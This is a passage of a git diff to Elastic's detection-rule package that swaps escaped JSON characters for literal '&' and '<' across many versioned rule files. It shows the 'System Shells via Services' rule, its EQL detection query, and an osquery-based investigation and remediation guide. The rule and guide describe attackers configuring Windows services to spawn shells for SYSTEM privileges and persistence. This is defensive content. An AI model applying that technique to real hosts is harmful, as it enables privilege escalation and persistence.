looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"services.exe\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n\n /* Third party FP's */\n not process.args : \"NVDisplay.ContainerLocalSystem\"\n", "related_integrations": [ { @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_108.json b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_108.json index f1206254a02..76c4c4ef604 100644 --- a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_108.json +++ b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "System Shells via Services", - "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"services.exe\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n\n /* Third party FP's */\n not process.args : \"NVDisplay.ContainerLocalSystem\"\n", "related_integrations": [ { @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_1.json b/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_1.json index ba62bbc672a..97b2e502ec2 100644 --- a/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_1.json +++ b/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_1.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_2.json b/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_2.json index b4783715a71..505dcf52668 100644 --- a/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_2.json +++ b/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_2.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_101.json b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_101.json index adc4756c366..703f2ef1c55 100644 --- a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_101.json +++ b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_101.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_102.json b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_102.json index c1776a8a920..86f5a212664 100644 --- a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_102.json +++ b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_102.json b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_102.json index a5d47000c5c..01bee6cb8c2 100644 --- a/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_102.json +++ b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_103.json b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_103.json index 073ebb0ec56..31510ec0d96 100644 --- a/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_103.json +++ b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_104.json b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_104.json index c44b0754390..adb2f91c465 100644 --- a/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_104.json +++ b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_205.json b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_205.json index 717ccd395de..6fe8a6ce751 100644 --- a/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_205.json +++ b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_205.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_1.json b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_1.json index 3133587aaf4..47e9ac4ec4b 100644 --- a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_1.json +++ b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_1.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -62,7 +62,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_2.json b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_2.json index 9ab37a0e545..b7fd6b962f8 100644 --- a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_2.json +++ b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_2.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -67,7 +67,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_3.json b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_3.json index ccf0896a9c7..65c72e85404 100644 --- a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_3.json +++ b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_3.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -69,7 +69,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_4.json b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_4.json index 6b5dad5383e..fcd4fe84951 100644 --- a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_4.json +++ b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_4.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -70,7 +70,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_101.json b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_101.json index fc470961585..385390e3417 100644 --- a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_101.json +++ b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_101.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "027ff9ea-85e7-42e3-99d2-bbb7069e02eb", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_102.json b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_102.json index 8d75e8d6eb8..65a4b419b66 100644 --- a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_102.json +++ b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_102.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "027ff9ea-85e7-42e3-99d2-bbb7069e02eb", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_103.json b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_103.json index 777d6f46a6f..24fb6bf14c8 100644 --- a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_103.json +++ b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_103.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "027ff9ea-85e7-42e3-99d2-bbb7069e02eb", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_104.json b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_104.json index 7aa41e259fd..17abfe79d1a 100644 --- a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_104.json +++ b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_104.json @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "027ff9ea-85e7-42e3-99d2-bbb7069e02eb", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_3.json b/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_3.json index 3a7b7a75c56..dee470872bc 100644 --- a/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_3.json +++ b/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_3.json @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_4.json b/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_4.json index 1a57d68d561..53e9be2281c 100644 --- a/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_4.json +++ b/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_4.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_5.json b/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_5.json index 397301722f1..c82976ac053 100644 --- a/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_5.json +++ b/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_5.json @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_103.json b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_103.json index 1167bfae386..342168c6e17 100644 --- a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_103.json +++ b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_103.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "02a4576a-7480-4284-9327-548a806b5e48", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_104.json b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_104.json index c5165db7748..bc6536fc987 100644 --- a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_104.json +++ b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_104.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "02a4576a-7480-4284-9327-548a806b5e48", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_105.json b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_105.json index 193fd955fac..c668c9daf75 100644 --- a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_105.json +++ b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_105.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "02a4576a-7480-4284-9327-548a806b5e48", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default 